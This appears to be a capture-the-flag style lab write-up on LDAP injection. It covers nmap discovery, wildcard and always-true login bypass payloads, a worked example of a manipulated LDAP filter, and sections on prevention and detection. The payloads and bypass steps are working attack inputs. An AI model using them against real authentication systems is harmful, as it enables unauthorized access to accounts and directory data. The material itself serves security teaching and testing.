LDAP Injection Attacks
π― Objective: Exploit LDAP injection vulnerabilities in web applications to bypass authentication and access sensitive directory information.
Overview
LDAP Injection attacks target web applications that use LDAP (Lightweight Directory Access Protocol) for authentication or user management. By injecting special characters into LDAP queries, attackers can bypass authentication and manipulate directory searches.
HTB Academy Lab Solution
Lab: Authentication Bypass
Question: "After bypassing the login, what is the website 'Powered by'?"
Step 1: Service Discovery
# Nmap scan to identify services
nmap -p- -sC -sV --open --min-rate=1000 TARGET
# Expected results:
# 80/tcp open http Apache httpd 2.4.41 (Ubuntu)
# 389/tcp open ldap OpenLDAP 2.2.X - 2.3.XStep 2: LDAP Injection Attack
# Navigate to login page
# URL: http://TARGET/
# LDAP injection payloads for authentication bypass:
Username: *
Password: *
# Alternative payloads:
Username: admin
Password: *
Username: *
Password: passwordStep 3: Post-Authentication Analysis
# After successful login bypass, examine the page source
# Look for "Powered by" information in:
# - Page footer
# - HTML comments
# - HTTP headers
# - About/version pagesExpected Answer: Framework/CMS name from "Powered by" text (extract from bypassed page)
LDAP Injection Techniques
Common Injection Characters
# Special LDAP characters for injection
* # Wildcard - matches any number of characters
( ) # Parentheses - group expressions
| # Logical OR operator
& # Logical AND operatorAuthentication Bypass Payloads
# Wildcard injection
Username: *
Password: *
# Always-true conditions
Username: (cn=*)
Password: anything
Username: (objectClass=*)
Password: anythingQuery Structure Manipulation
# Original LDAP query:
(&(objectClass=user)(sAMAccountName=$username)(userPassword=$password))
# Injected query with *:
(&(objectClass=user)(sAMAccountName=*)(userPassword=*))
# Result: Matches any user with any passwordTechnical Details
LDAP Query Components
# Standard authentication query structure
(&(objectClass=user)(uid=$username)(userPassword=$password))
# Components:
# & = AND operator
# objectClass=user = filter for user objects
# uid=$username = username field
# userPassword=$password = password fieldInjection Points
Username fields - Primary injection vector
Password fields - Secondary injection vector
Search filters - Advanced injection opportunities
DN parameters - Distinguished Name manipulation
Vulnerable Applications
Web portals using LDAP authentication
Enterprise applications with AD integration
Custom applications with poor input validation
Legacy systems without proper sanitization
Impact Assessment
Authentication Bypass:
Unauthorized access to protected resources
Administrative privilege escalation
User account enumeration
Directory information disclosure
Information Disclosure:
User credentials and attributes
Organizational structure data
Group memberships and permissions
System configuration details
Attack Escalation:
Lateral movement through directory services
Privilege escalation via group membership
Data exfiltration from LDAP directory
Further application compromise
Detection & Mitigation
Prevention:
Input validation - Sanitize all user inputs
Parameterized queries - Use prepared statements
Least privilege - Limit LDAP service account permissions
Escape special characters - Remove LDAP metacharacters
Detection:
Log analysis - Monitor for LDAP query anomalies
Authentication monitoring - Track failed/successful logins
Input validation testing - Regular security assessments
π‘ Pro Tip: LDAP injection is often overlooked compared to SQL injection, but it's equally dangerous in enterprise environments with Active Directory integration - always test authentication forms with wildcard characters.
Last updated